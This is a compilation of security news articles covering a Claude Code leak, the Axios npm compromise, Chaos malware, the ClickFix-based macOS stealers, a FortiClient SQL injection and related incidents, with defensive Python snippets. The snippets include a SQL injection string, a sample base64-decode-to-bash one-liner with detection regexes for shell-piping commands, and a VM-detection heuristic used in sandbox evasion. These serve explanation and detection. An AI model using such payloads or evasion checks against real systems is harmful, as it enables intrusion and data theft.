Anthropic's Claude Code Leak: 500K Lines Exposed

On March 31, 2026, Anthropic, the safety-focused AI company behind Claude, accidentally leaked over 500,000 lines of proprietary source code for its Claude Code tool through a public npm package update. The incident, the second such breach in a year, exposed nearly 2,000 TypeScript files via a debugging file mistakenly included in version 2.1.88, which linked to a publicly accessible zip archive on Anthropic's Cloudflare storage. Security researcher Chaofan Shou quickly spotted the error, sparking rapid mirroring on GitHub, where repositories amassed thousands of stars before takedowns. 

The leak revealed Claude Code's full architecture, including 44 feature flags for unreleased capabilities like a "persistent assistant" that runs in the background even when users are inactive. Other hidden gems included session review for performance improvement across conversations, remote control from mobile devices, and a roadmap toward longer autonomous tasks, enhanced memory, and multi-agent collaboration. Developers also uncovered internal tools, prompts, and even a "pet system" codenamed Buddy with species and rarity tiers, hinting at gamified enterprise features. 

Anthropic swiftly responded, calling it "human error" in a release packaging issue, not a security breach, with no sensitive data exposed. The company issued over 8,000 DMCA takedown requests to platforms like GitHub, removing thousands of forks within days. Claude Code creator Boris Cherny confirmed a skipped manual deploy step caused the mishap, and Anthropic pledged process improvements to prevent recurrence. 

This incident underscores vulnerabilities in AI firms' deployment pipelines, especially for a lab positioning itself as security-conscious amid IPO preparations. Competitors now gain insights into production-grade AI coding agents, potentially accelerating their own developments in agent orchestration and tools. While unlikely to derail Anthropic's $340 billion valuation, it highlights how securing AI systems rivals defending against AI-powered threats. 

Ultimately, the Claude Code leak serves as a stark reminder for the AI industry to fortify internal safeguards as innovations race ahead. It boosts hype around Anthropic's capabilities while exposing the human element in high-stakes tech releases. As external developers reverse-engineer remnants, the focus shifts to ethical use and robust verification in open-source ecosystems.

Axios Supply Chain Attack Exposes npm Security Gaps with Token-Based Compromise

A breach in the Axios library - one of the most heavily relied-upon packages in modern web development - has exposed flaws that linger beneath surface-level fixes. Through a stolen access token, hackers slipped harmful updates into what users assumed was safe code. The event underscores how fragile trust can be, even when systems claim stronger defenses. Progress in verifying packages and securing logins appears incomplete, given that such exploits still succeed. Confidence in tools hosted on npm remains shaken by failures that feel both avoidable and familiar. 

According to reports from Huntress and Wiz, hackers gained access to a lead developer's long-lived npm token. Through this entry point, altered builds of Axios emerged - versions laced with hidden code deploying a cross-platform remote access tool. The harmful update was not limited to one environment: it reached machines running macOS, Windows, or Linux. The rogue releases stayed live for just under three hours before being taken down. 
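Teams that consume Axios can check their own lockfiles for a pinned bad release. A minimal sketch, assuming an npm v2/v3 `package-lock.json` layout; the version strings below are placeholders, not the real compromised releases, which should be taken from the Huntress and Wiz advisories:

```python
import json

# Hypothetical compromised versions -- consult the Huntress/Wiz advisories
# for the real release numbers before relying on this check.
BAD_VERSIONS = {"0.0.0-compromised-a", "0.0.0-compromised-b"}

def find_bad_axios(lockfile_text: str) -> list:
    """Return npm v2/v3 lockfile entries that pin axios to a bad version."""
    lock = json.loads(lockfile_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # v2/v3 lockfiles key each entry by its node_modules path.
        if path.endswith("node_modules/axios") and meta.get("version") in BAD_VERSIONS:
            hits.append(f"{path}@{meta['version']}")
    return hits

# Demo with an inline lockfile fragment.
sample = json.dumps({
    "packages": {
        "node_modules/axios": {"version": "0.0.0-compromised-a"},
        "node_modules/follow-redirects": {"version": "1.15.6"},
    }
})
print(find_bad_axios(sample))
```

Pinning exact versions in a lockfile, rather than floating ranges, is what makes this kind of after-the-fact audit possible at all.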

Axios ranks among the top tools in JavaScript, downloaded more than a hundred million times each week and found in roughly eight out of ten cloud setups. Moments after the tainted update went live, the malware started spreading fast; Huntress later verified infections on 135 machines while the compromise was active. Hidden within a third-party dependency, plain-crypto-js slipped into Axios's environment without touching its main codebase - not through direct changes, but via a concealed payload activated after installation. 
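Because the payload ran at install time rather than as changed library code, one practical audit is to list which installed packages declare automatic npm lifecycle scripts at all. A hedged sketch; the `evil-dep` package below is hypothetical, standing in for a malicious dependency:

```python
import json
import tempfile
from pathlib import Path

# npm lifecycle hooks that run automatically during `npm install` --
# the mechanism an install-time payload abuses.
AUTO_HOOKS = {"preinstall", "install", "postinstall"}

def packages_with_install_scripts(node_modules: Path) -> dict:
    """Map package name -> the auto-run lifecycle scripts it declares."""
    found = {}
    for manifest in sorted(node_modules.glob("*/package.json")):
        try:
            pkg = json.loads(manifest.read_text())
        except (OSError, json.JSONDecodeError):
            continue
        hooks = {k: v for k, v in pkg.get("scripts", {}).items() if k in AUTO_HOOKS}
        if hooks:
            found[pkg.get("name", manifest.parent.name)] = hooks
    return found

# Demo against a throwaway directory standing in for node_modules.
demo = Path(tempfile.mkdtemp())
(demo / "evil-dep").mkdir()
(demo / "evil-dep" / "package.json").write_text(
    json.dumps({"name": "evil-dep",
                "scripts": {"postinstall": "node payload.js"}}))
print(packages_with_install_scripts(demo))
```

Most packages declare no install hooks, so the output of a sweep like this is short enough to review by hand, and `npm install --ignore-scripts` disables the hooks outright.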

Running quietly once set up, it triggered deployment of a remote access tool on developers’ systems. Built to avoid notice, the malicious code erased itself under certain conditions. Altered components were restored automatically, masking traces left behind. One reason this breach stands out lies in its method - evading defenses thought secure. Even after adopting standard safeguards like OIDC for verified publishing and robust supply chain models, outdated tools remained active. 

A leftover npm access key opened the door despite stronger systems being in place. Where two login paths existed, preference went to the original token, rendering recent upgrades useless under that condition. This is now the third significant breach of the npm supply chain in just a few months, after events such as the Shai-Hulud incident. 

Each time, hackers used compromised maintainer login details to gain access, revealing a recurring weakness across the system. Though security professionals highlight benefits of measures like multi-factor verification and origin monitoring, these fail to block every threat when login data is exposed. 

With growing pressure, companies must examine third-party dependencies, apply tighter rules on software installation, and phase out outdated access methods. When trust rests on open-source tools, weaknesses in how credentials are handled can still invite breaches. A single event shows flaws aren't always in the code itself - sometimes they hide where access is managed.

Arbitrary File Write Bug in Gigabyte Control Center Sparks Security Alerts

Trusted system utilities are increasingly proving to carry persistent security risks. GIGABYTE Control Center, a widely deployed Windows-based management tool packaged with select devices, has come under scrutiny following the disclosure of a critical security flaw. 

The software, designed to give users centralized control over essential hardware functions, inadvertently exposed a pathway for threat actors to alter system behavior at a fundamental level. Although the vulnerability has now been addressed, it could be exploited to execute unauthorized code, write arbitrary files, and potentially disrupt system availability through denial of service. 

Since the utility is deeply entwined with device operations and ships on GIGABYTE motherboards, the vulnerability has significant implications for both individual users and enterprises, making timely patching and system hardening increasingly important. The affected software is GIGABYTE Control Center, which comes pre-installed on GIGABYTE laptops and supported motherboards and serves as a central point of configuration and oversight for the entire system.

Integrated with Windows, it provides a comprehensive set of operational controls for monitoring and managing hardware, adjusting thermal and fan curves, optimizing performance, customizing RGB lighting, and installing driver and firmware updates. 

The broad access to underlying system functions, which is intended to enhance user convenience, amplifies the potential impact of any vulnerabilities in the system. There is a particular concern regarding an integrated "pairing" feature designed to facilitate communication between host systems and external devices or services over a network. 

When enabled in Control Center versions up to and including 25.07.21.01, this function significantly expands the application's interaction surface, introducing a network-exposed vector that can be exploited under specific circumstances. Because the pairing feature is linked to elevated system privileges and network-enabled communication, it is a focal point when assessing the overall risk profile of the vulnerability. 

The issue has been assigned CVE-2026-4415, rated 9.2 under the CVSS 4.0 framework, and was identified within the pairing mechanism of GIGABYTE Control Center versions 25.07.21.01 and earlier. The root cause is insufficient safeguards in how the application handles network-initiated interactions; researcher David Sprüngli is credited with discovering the vulnerability. 

The pairing feature provides an opportunity for unauthenticated remote actors to write arbitrary files across the system's file structure when it is active. With the utility's elevated privileges and close integration with system processes, such access is potentially useful for the execution of remote code, escalation of privileges, or disruption of system availability. 

A particularly concerning aspect of the vulnerability is that it bypasses conventional trust boundaries, effectively turning a legitimate management feature into an attack vector. GIGABYTE has released Control Center version 25.12.10.01, which introduces corrections across multiple functional layers, including download handling routines, message validation processes, and command-level encryption. In combination, these enhancements mitigate the risks associated with the exposed pairing interface. 
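Until the update is applied everywhere, administrators can triage installed machines with a simple version comparison. A sketch using the version numbers from the advisory; it conservatively treats anything below the patched release as needing an update:

```python
PATCHED = "25.12.10.01"   # first Control Center release with the fixes

def parse(version: str) -> tuple:
    """Split a dotted Control Center version string into comparable integers."""
    return tuple(int(part) for part in version.split("."))

def needs_update(installed: str) -> bool:
    """GIGABYTE lists versions 25.07.21.01 and earlier as vulnerable;
    conservatively flag anything below the patched release."""
    return parse(installed) < parse(PATCHED)

print(needs_update("25.07.21.01"))   # affected release
print(needs_update("25.12.10.01"))   # patched release
```

Comparing tuples of integers avoids the classic string-comparison pitfall where "25.7" would sort after "25.12".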

According to the company's advisory, users should update immediately and obtain the patched version only through official software distribution channels, reducing the risk of compromised or tampered installers. Such incidents reinforce the importance of treating vendor-supplied utilities the same way we'd treat any externally sourced software, especially when they run with elevated privileges and have network access. 

The company and individual users should both adopt a proactive patch management strategy, audit pre-installed applications on a regular basis, and disable features not specifically required for use, such as remote pairing. The implementation of multiple security controls, including endpoint monitoring, network segmentation, and strict access policies, can significantly reduce exposure to similar threats. 

As the integration of hardware ecosystems and software-driven management layers becomes increasingly complex, maintaining vigilance over these trusted components is crucial to preserving the integrity of the overall system.

New Chaos Malware Variant Expands to Cloud Targets, Introduces Proxy Capability

A newly observed version of the Chaos malware is now targeting poorly secured cloud environments, indicating a defining shift in how this threat is being deployed and scaled.

According to analysis by Darktrace, the malware is increasingly exploiting misconfigured cloud systems, moving beyond its earlier focus on routers and edge devices. This change suggests that attackers are adapting to the growing reliance on cloud infrastructure, where configuration errors can expose critical services.

Chaos was first identified in September 2022 by Lumen Black Lotus Labs. At the time, it was described as a cross-platform threat capable of infecting both Windows and Linux machines. Its functionality included executing remote shell commands, deploying additional malicious modules, spreading across systems by brute-forcing SSH credentials, mining cryptocurrency, and launching distributed denial-of-service attacks using protocols such as HTTP, TLS, TCP, UDP, and WebSocket.

Researchers believe Chaos developed from an earlier DDoS-focused malware strain known as Kaiji, which specifically targeted exposed Docker instances. While the exact operators behind Chaos remain unidentified, the presence of Chinese-language elements in the code and the use of infrastructure linked to China suggest a possible connection to threat actors from that region.

Darktrace detected the latest variant within its honeypot network, specifically on a deliberately misconfigured Hadoop deployment that allowed remote code execution. The attack began with an HTTP request sent to the Hadoop service to initiate the creation of a new application.

That application contained a sequence of shell commands designed to download a Chaos binary from an attacker-controlled domain, identified as “pan.tenire[.]com.” The commands then modified the file’s permissions using “chmod 777,” allowing full access to all users, before executing the binary and deleting it from the system to reduce forensic evidence.
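The same misconfiguration can be checked for defensively: Hadoop's ResourceManager serves an unauthenticated REST API under `/ws/v1/cluster/`, and an anonymous reply from it means the application-submission path the attackers used is reachable too. A minimal probe sketch; the live call is wrapped so the reachability logic can be tested separately:

```python
import json
import urllib.request

# Unauthenticated ResourceManager REST path; the attack submitted its app
# through the sibling /ws/v1/cluster/apps/new-application endpoint.
YARN_INFO = "/ws/v1/cluster/info"

def looks_like_open_yarn(body: dict) -> bool:
    """An anonymous clusterInfo reply means anyone who can reach the
    ResourceManager can also submit applications to it."""
    return "clusterInfo" in body

def is_exposed(base_url: str, timeout: float = 3.0) -> bool:
    """Probe a ResourceManager URL without credentials."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + YARN_INFO,
                                    timeout=timeout) as resp:
            return looks_like_open_yarn(json.load(resp))
    except (OSError, ValueError):
        return False
```

Running `is_exposed("http://rm.internal:8088")` against your own cluster from an untrusted network segment is a quick way to confirm that authentication is actually enforced.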

Notably, the same domain had previously been linked to a phishing operation conducted by the cybercrime group Silver Fox. That campaign, referred to as Operation Silk Lure by Seqrite Labs in October 2025, was used to distribute decoy documents and ValleyRAT malware, suggesting infrastructure reuse across campaigns.

The newly identified sample is a 64-bit ELF binary that has been reworked and updated. While it retains much of its original functionality, several features have been removed. In particular, capabilities for spreading via SSH and exploiting router vulnerabilities are no longer present.

In their place, the malware now incorporates a SOCKS proxy feature. This allows compromised systems to relay network traffic, effectively masking the origin of malicious activity and making detection and mitigation more difficult for defenders.
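Defenders can hunt for such relays because the SOCKS5 handshake (RFC 1928) is trivial to recognize: a host that answers an anonymous greeting with the two-byte reply `05 00` is an open proxy. A sketch of just the handshake bytes; wiring `client_greeting()` to a real socket is left out:

```python
# SOCKS5 handshake constants (RFC 1928).
SOCKS_VERSION = 0x05
NO_AUTH = 0x00

def client_greeting() -> bytes:
    """Bytes a SOCKS5 client sends first: version, method count, 'no auth'."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])

def accepts_anonymous_socks(reply: bytes) -> bool:
    """True when a server's two-byte reply advertises SOCKS5 with no
    authentication -- the behavior an open relay on a compromised host
    would exhibit."""
    return len(reply) == 2 and reply[0] == SOCKS_VERSION and reply[1] == NO_AUTH

print(accepts_anonymous_socks(b"\x05\x00"))   # open SOCKS5, no auth
print(accepts_anonymous_socks(b"\x05\xff"))   # no acceptable method
```

Unexpected listeners that speak this handshake on developer or server machines are a strong indicator of exactly the proxy abuse described above.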

Darktrace also noted that components previously associated with Kaiji have been modified, indicating that the malware has likely been rewritten or significantly refactored rather than simply reused.

The addition of proxy functionality points to a broader monetization strategy. Beyond cryptocurrency mining and DDoS-for-hire operations, attackers may now leverage infected systems to provide anonymized traffic routing or other illicit services, reflecting increasing competition within cybercriminal ecosystems.

This shift aligns with a wider trend observed in other botnets, such as AISURU, where proxy services are becoming a central feature. As a result, the threat infrastructure is expanding beyond traditional service disruption to include more complex abuse scenarios.

Security experts emphasize that misconfigured cloud services, including platforms like Hadoop and Docker, remain a critical risk factor. Without proper access controls, attackers can exploit these systems to gain initial entry and deploy malware with minimal resistance.

The continued evolution of Chaos underlines how threat actors are persistently enhancing their tools to expand botnet capabilities. It also reinforces the need for continuous security monitoring, as changes in how APIs and services function may not always appear as direct vulnerabilities but can exponentially increase exposure.

Organizations are advised to regularly audit configurations, restrict unnecessary access, and monitor for unusual behavior to mitigate the risks posed by increasingly adaptive malware threats.

Apple Reinforces Digital Privacy for Users Without Restricting Law Enforcement Oversight

Apple has long positioned its privacy architecture as a defining aspect of its ecosystem, marketing privacy not merely as a feature but as a fundamental right built into its products. However, recent disclosures emerging from US legal proceedings suggest that these privacy boundaries are neither absolute nor impermeable, and that a more nuanced reality applies. 

Under scrutiny is the "Hide My Email" function, a tool designed to hide users' real email addresses from third-party apps and websites. Despite its success in minimizing commercial tracking and unsolicited exposure, recent legal revelations indicate that this layer of anonymity can be effectively reversed under lawful authority. 

The development highlights the important distinction between consumer privacy assurances and the judicial obligations imposed on technology companies, reframing Hide My Email not as a cloak of invisibility but as a controlled filter operating within clearly defined legal limits. 

Subsequent disclosures from investigative proceedings provide additional insight into how this conditional anonymity works in practice. Apple received a request from federal authorities, including the Federal Bureau of Investigation, for subscriber information regarding a threatening communication directed at Alexis Wilkins, a person reported to be associated with FBI Director Kash Patel.

According to the warrant application, Apple was able to correlate the anonymized "Hide My Email" alias to a specific user account, providing subscriber identification details along with a wider dataset containing over a hundred additional aliases created under the same profile. Homeland Security Investigations handled an alleged identity fraud operation in a similar manner: multiple masked email identities were linked back to their underlying Apple accounts, allowing investigators to consolidate disparate digital footprints into a single framework for attribution. 

Collectively, these examples reveal an important structural aspect of Apple's ecosystem: while certain layers of iCloud services are protected by end-to-end encryption, a portion of account and communication information remains accessible under valid legal process. Subscriber information, including names, billing credentials, and associated identifiers, sits within a compliance boundary rather than a cryptographic one, and is not protected by end-to-end encryption. 

The delineation reinforces an issue of broader significance to the industry: conventional email infrastructure was built without pervasive encryption safeguards, leaving it inherently accessible to lawful interception. It is against this backdrop that privacy-conscious individuals are increasingly turning to platforms such as Signal, which offer default end-to-end encryption and minimal data retention. 

Apple has not responded directly to these developments, although the disclosures have prompted renewed attention to how privacy assurances are communicated and understood in environments that are both technologically advanced and legally obligated. The disclosures also come against a backdrop of sustained growth in government access requests to major technology providers. 

According to Apple's transparency data, it processed more than 13,000 such requests for customer information during the first half of 2025, with email-related records contributing significantly to account attribution, threat analysis, and criminal investigations due to their evidentiary value. Nevertheless, this dynamic is not limited to Apple's ecosystem.

Similar constraints exist among providers such as Google and Microsoft, where legacy email protocols - architected in an era before modern encryption standards - continue to limit the amount of privacy protection inherent within their systems. Although niche services such as Proton have attempted to address this issue by implementing end-to-end encryption by design, their adoption remains marginal relative to the global email user base, which underscores the persistence of structurally exposed communication channels within this environment. 

Apple's position is especially interesting in light of the divergence between its privacy-oriented messaging and the technical realities of its email infrastructure. Hide My Email demonstrably reduces exposure to commercial tracking and data aggregation, but it does not alter the underlying compliance model governing lawful data access. 

The distinction has re-ignited an ongoing policy debate around encryption, a controversy Apple has previously encountered with iMessage and other Apple services. Regulators and law enforcement agencies contend that inaccessible communications impede legitimate investigations, and extending comparable end-to-end encryption to iCloud Mail could result in renewed friction.

In contrast, privacy advocates contend that any lowering of encryption standards introduces systemic security risks. Thus, email privacy currently remains a compromise governed by both legal frameworks and engineering decisions. 

Users seeking stronger privacy commonly rely on specialized encryption platforms, but these present usability constraints and interoperability challenges with the larger email ecosystem. An important distinction emerges from the recent federal requests: privacy controls designed to limit commercial visibility of user data do not automatically restrict government access. 

Apple's products operate within this boundary, balancing user expectations with statutory obligations. However, a considerable gap remains between perception and operational reality, one that calls for reevaluation. It is unclear whether the company will extend its end-to-end encryption model to email services, particularly given the political and regulatory implications of such a shift. 

These developments underscore that privacy is not a binary guarantee but a layered construct shaped by both technical design and legal jurisdiction. Organizations and individuals alike should reassess their threat models, distinguishing clearly between protections for sensitive communications and protections against commercial data exposure. 

Where confidentiality is paramount, standard email services may be insufficient, necessitating selective adoption of stronger encryption techniques, secure communication channels, and disciplined data handling procedures. Given the clear, and often misunderstood, boundaries within which privacy features operate, informed usage remains the most reliable safeguard.

How Duck.ai Offers Better Privacy Compared to Commercial Chatbots

Better privacy with DuckDuckGo's AI bot

Privacy has long been a concern for both users and businesses, and the rapid adoption of AI is raising the stakes. DuckDuckGo's Duck.ai chatbot is benefiting from that anxiety.

The latest report from Similarweb revealed that traffic to Duck.ai increased rapidly last month, reaching 11.1 million visits in February 2026 - 300% more than in January. 

Duck.ai's sudden traffic jump

These numbers seem small compared with the most popular chatbots such as ChatGPT, Claude, or Gemini. 

Similarweb estimates that ChatGPT recorded 5.4 billion visits in February 2026, and Google’s Gemini recorded 2.1 billion, whereas Claude recorded 290.3 million. 

For DuckDuckGo, the numbers are a good sign: the bot only launched in beta in 2025 and has already shown a sharp rise in visits. 

The DuckDuckGo browser is known for its privacy protections, and the company aims to apply the same principle to its AI bot. Duck.ai doesn't run a bespoke LLM; it uses frontier models from Meta, Anthropic, and OpenAI, but it doesn't expose your IP address or personal data to them. 

Duck.ai's privacy policy reads, "In addition, we have agreements in place with all model providers that further limit how they can use data from these anonymous requests, including not using Prompts and Outputs to develop or improve their models, as well as deleting all information received once it is no longer necessary to provide Outputs (at most within 30 days, with limited exceptions for safety and legal compliance),”

Duck.ai is famous now

What is the reason for this sudden surge? The bot has two advantages over individual commercial bots like ChatGPT and Gemini: it offers an option to toggle between multiple models, and it offers stronger privacy. The privacy aspect sets it apart. Users on Reddit have praised Duck.ai, with one person noting "it's way better than Google's," meaning Gemini. 

Privacy concerns in AI bots

In March, Anthropic rejected a few applications of its technology for mass surveillance and weapons submitted by the Department of Defense. The DoD retaliated by breaking the contract. Soon after, OpenAI stepped in. 

The incident stirred controversies around privacy concerns and ethical AI use. This explains why users may prefer chatbots like Duck.ai that safeguard user data from both the government and the big tech. 

Infiniti Stealer Targets Mac Users with ClickFix Social Engineering Attack

Not stopping at typical malware tricks, Infiniti Stealer targets Macs using clever social manipulation instead of system flaws. Security firm Malwarebytes uncovered the operation, highlighting how it dodges standard protection tools. Once inside, the software slips under the radar easily. What stands out is its reliance on tricking users, not breaking through digital walls. 

Starting off, attackers rely on a technique called ClickFix, tricking people into running harmful software without realizing it. Instead of clear warnings, users land on fake websites designed to look real - usually through deceptive emails or infected links. These pages imitate trusted security checks used by Cloudflare, copying their layout closely. A common "I am not a robot" checkbox shows up first. Then come misleading directions hidden inside what seem like normal steps. Though simple at a glance, each piece nudges victims toward unintended actions.  

Spotlight pops up when users start the process, guiding them toward finding Terminal. Once there, they run an unfamiliar line of code by pasting it directly. What seems like a small task hides its real intent - execution happens under human control, so security tools often stand down. The trick works because actions led by people rarely trigger alarms, even if those actions carry risk. Hidden behind normal behavior, the command slips through defenses without raising flags. 

Execution triggers installation of Infiniti Stealer onto the system. Though built in Python, it becomes a standalone macOS executable through compilation with Nuitka. Because of this conversion, detection by security software weakens. Analysis grows more difficult when facing such repackaged threats instead of standard interpreted scripts. Stealth improves simply by changing how the code runs.  

Once installed, it starts pulling private details from the compromised device. Stored login credentials, web history and cookies, and snapshots of the screen are among what gets gathered. From there, the data flows toward remote machines managed by the hackers - opening doors to hijacked accounts or stolen identities. What leaves the machine often fuels more invasive misuse downstream. What stands out is how this campaign signals a change in the way attackers operate. 

Moving away from technical flaws or harmful file attachments, they now lean heavily on manipulating people’s actions - especially by abusing their confidence in everyday website features such as CAPTCHA challenges. When unsure, steer clear of directions from unknown online sources - particularly if they involve running Terminal commands. Real authentication processes never ask people to enter scripts into core system utilities. 
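One practical follow-up is to sweep shell history for the command shapes ClickFix relies on. A heuristic sketch only; the patterns and the sample URL are illustrative, and false positives are expected:

```python
import re

# Patterns typical of ClickFix-style pasted commands: fetch-and-pipe-to-
# shell and inline base64 decoding. Heuristic, not a definitive detector.
SUSPICIOUS = [
    re.compile(r"curl[^|\n]*\|\s*(ba|z)?sh"),
    re.compile(r"base64\s+(-d|-D|--decode)"),
]

def flag_history_lines(history: str) -> list:
    """Return shell-history lines matching any ClickFix-style pattern."""
    return [line for line in history.splitlines()
            if any(p.search(line) for p in SUSPICIOUS)]

# Demo against a fabricated history; the flagged URL is a placeholder.
sample = "\n".join([
    "ls -la",
    "curl -s https://captcha.example.invalid/v | bash",
    "git status",
])
print(flag_history_lines(sample))
```

Pointing the function at the contents of `~/.zsh_history` or `~/.bash_history` gives a quick first pass at whether a pasted verification command ever ran on a machine.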

When signs of infection appear, stop using the device without delay. Security professionals suggest changing credentials through an unaffected system right away. Access tokens tied to the infected hardware should be invalidated promptly. A different machine must handle these updates to prevent further exposure.

Critical Fortinet FortiClient EMS Flaw Now Actively Exploited in Cyberattacks

A critical vulnerability in Fortinet’s FortiClient EMS platform is now being actively exploited in real‑world attacks, according to threat‑intelligence firm Defused. Tracked as CVE‑2026‑21643, this SQL injection bug affects FortiClient EMS version 7.4.4 and allows unauthenticated attackers to run arbitrary code or commands through the platform’s web interface. The flaw can be triggered by specially crafted HTTP requests that smuggle malicious SQL statements via the Site header, giving an attacker a powerful foothold on unpatched systems. 

Modus operandi 

The vulnerability lives in the FortiClient EMS GUI, which organizations use to manage and deploy FortiClient endpoints across their networks. By manipulating the Site header in an HTTP request, an attacker can inject SQL code into the back‑end database, bypassing authentication entirely. This “low‑complexity” attack vector means that even unsophisticated adversaries can weaponize the bug if they can reach the exposed web interface. Because the flaw is critical, it can lead to full system compromise, data theft, or a springboard into a broader corporate network. 
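The EMS database schema is not public, so the following generic sqlite3 sketch only illustrates the vulnerability class: a header value concatenated into SQL changes the query's structure, while a bound placeholder cannot.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE sites (name TEXT)")
conn.execute("INSERT INTO sites VALUES ('hq')")

def lookup_unsafe(site: str):
    # String concatenation: attacker-controlled header text becomes SQL.
    return conn.execute(f"SELECT name FROM sites WHERE name = '{site}'").fetchall()

def lookup_safe(site: str):
    # Placeholder binding: the value can never alter the query structure.
    return conn.execute("SELECT name FROM sites WHERE name = ?", (site,)).fetchall()

payload = "x' OR '1'='1"
print(lookup_unsafe(payload))  # every row comes back: the injection succeeds
print(lookup_safe(payload))    # empty result: treated as a literal string
```

The same principle, parameterized queries everywhere user-influenced data touches SQL, is the standard remediation for this entire bug class.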

Defused reported that it observed the first exploitation of CVE‑2026‑21643 just four days after the initial vulnerability disclosures. The firm noted that over 900 FortiClient EMS instances are publicly exposed on the internet according to Shodan data, giving attackers a large pool of potential targets. Meanwhile, Internet‑security watchdog Shadowserver is tracking more than 2,000 exposed FortiClient EMS web interfaces, with over 1,400 IPs located in the United States and Europe. Despite this, Fortinet has not yet updated its advisory to mark the bug as “exploited in the wild,” even though a local media outlet reached out to confirm active attacks. 

Fortinet vulnerabilities have repeatedly been abused in ransomware and cyber‑espionage campaigns, often as zero‑days while patches are still rolling out. In the case of FortiClient EMS, prior SQL injection flaws were exploited in ransomware attacks and by state‑sponsored groups such as China’s “Salt Typhoon” to breach telecom providers. CISA has already flagged 24 Fortinet vulnerabilities as known‑exploited, 13 of which were tied directly to ransomware. That history makes this new FortiClient EMS bug a high‑priority item for organizations relying on Fortinet for endpoint security.

Mitigation tips 

Fortinet recommends upgrading affected FortiClient EMS systems to version 7.4.5 or later to close the CVE‑2026‑21643 vulnerability. Organizations should also review their internet‑exposed EMS interfaces and, where possible, restrict access behind VPNs or firewalls instead of leaving the GUI wide open online. In parallel, IT and security teams should hunt for anomalous database or system‑level activity that might indicate prior exploitation, such as unexpected command execution or lateral movement from the EMS server. Given Fortinet’s track record as a prime target for ransomware actors, patching this flaw quickly and validating exposure can significantly reduce the risk of a major breach.

Infinity Stealer Targets macOS Using ClickFix Trick and Python-Based Malware

A newly identified information-stealing malware, dubbed Infinity Stealer, is targeting macOS users through a sophisticated attack chain that blends social engineering with advanced evasion techniques. Security researchers at Malwarebytes report that this is the first known campaign combining the ClickFix technique with a Python-based payload compiled using the Nuitka compiler. The attack begins with a deceptive prompt designed to resemble a legitimate human verification step from Cloudflare. Victims are presented with a fake CAPTCHA and instructed to paste a command into the macOS Terminal to complete the verification. This method, known as ClickFix, tricks users into bypassing built-in operating system protections by executing malicious commands themselves. 

Once the command is executed, it decodes a hidden script that downloads and launches the next stage of the malware. The payload is compiled into a native macOS binary using Nuitka, which converts Python code into C-based executables. This approach makes the malware significantly harder to detect and analyze compared to traditional Python-based threats that rely on bytecode packaging tools. The infection chain unfolds in multiple stages. After the initial script runs, it installs a loader that extracts the final malware payload. Before initiating its malicious activities, the malware performs checks to determine whether it is running in a virtual or sandboxed environment, helping it evade detection by security tools.  
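The report does not detail the exact environment checks, but macOS sandbox detection commonly inspects the hardware model string. An illustrative heuristic only, not Infinity Stealer's actual logic; `sysctl -n hw.model` is the standard macOS way to read that string:

```python
import subprocess

# Substrings often present in hardware model strings of virtualized Macs.
# Illustrative list -- not the exact markers the malware checks for.
VM_MARKERS = ("vmware", "virtualbox", "parallels", "qemu", "virtual")

def looks_virtualized(model: str) -> bool:
    """Heuristic: does a hardware model string suggest a VM or sandbox?"""
    model = model.lower()
    return any(marker in model for marker in VM_MARKERS)

def current_model() -> str:
    """On macOS, `sysctl -n hw.model` reports the hardware model string."""
    try:
        out = subprocess.run(["sysctl", "-n", "hw.model"],
                             capture_output=True, text=True, check=True)
        return out.stdout.strip()
    except (OSError, subprocess.CalledProcessError):
        return ""

print(looks_virtualized("VMware7,1"))        # typical VM model string
print(looks_virtualized("MacBookPro18,3"))   # physical hardware
```

Analysts counter this exact trick by patching virtualization products to report hardware-like model strings, which is why such checks are heuristics on both sides.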

Once active, Infinity Stealer begins harvesting sensitive information from the infected system. This includes login credentials stored in Chromium-based browsers and Firefox, entries from the macOS Keychain, cryptocurrency wallet data, and plaintext secrets found in developer files such as .env configurations. It can also capture screenshots, adding another layer of data collection. The stolen information is then transmitted to attacker-controlled servers via HTTP requests. 

Additionally, notifications are sent through Telegram to alert threat actors when data exfiltration is complete, enabling real-time monitoring of compromised systems. Researchers warn that this campaign highlights the growing sophistication of threats targeting macOS, a platform often perceived as more secure. The use of social engineering combined with advanced compilation techniques demonstrates how attackers are evolving their methods to bypass traditional defenses. Users are strongly advised to avoid executing unknown commands in Terminal, especially those obtained from untrusted sources, as such actions can directly compromise system security.
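Because the ClickFix lure depends on the victim pasting a command into Terminal, the command often survives in shell history, giving defenders something to hunt for after the fact. The sketch below is illustrative only: the indicator patterns and sample history lines are hypothetical examples, not signatures from the Malwarebytes report.

```python
import re

# Hypothetical indicator patterns for ClickFix-style one-liners: commands
# that decode hidden data or pipe remote content straight into a shell.
SUSPICIOUS_PATTERNS = [
    re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh"),
    re.compile(r"curl\s+[^|]*\|\s*(?:ba)?sh"),
]

def flag_suspicious(history_lines):
    """Return history entries that match any ClickFix-style pattern."""
    return [line for line in history_lines
            if any(p.search(line) for p in SUSPICIOUS_PATTERNS)]

# Sample shell-history lines (the middle one mimics a pasted lure command)
sample = [
    "ls -la",
    "echo aGlkZGVuIHN0YWdlciBkb3dubG9hZCBjb21tYW5k | base64 -d | bash",
    "git status",
]
print(flag_suspicious(sample))  # prints only the base64-decode one-liner
```

Real triage would also check the zsh/bash history files of every user and correlate hits with recent browser activity, but pattern-matching pasted decode-and-execute one-liners is a reasonable first pass.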

Malware Hidden in Blockchain Networks Is Quietly Targeting Developers Worldwide



A new investigation has uncovered a cyberattack method that uses blockchain networks to quietly distribute malware, raising concerns among security researchers about how difficult it may be to stop once it spreads further.

The threat first surfaced when a senior engineering executive at Crystal Intelligence received a freelance opportunity through LinkedIn. The message appeared routine, asking him to review and run code hosted on GitHub. However, the request resembled a known tactic used by a North Korean-linked group often referred to as Contagious Interview, which relies on fake job offers to target developers.

Instead of proceeding, the executive examined the code and found something unusual. Hidden within it was the beginning of a multi-step attack designed to look harmless. A developer following normal instructions would likely execute it without noticing anything suspicious.

Once activated, the code connects to blockchain networks such as TRON and Aptos, which are commonly used because of their low transaction costs. These networks do not contain the malware itself but instead store information that directs the program to another blockchain, Binance Smart Chain. From there, the final malicious payload is retrieved and executed.

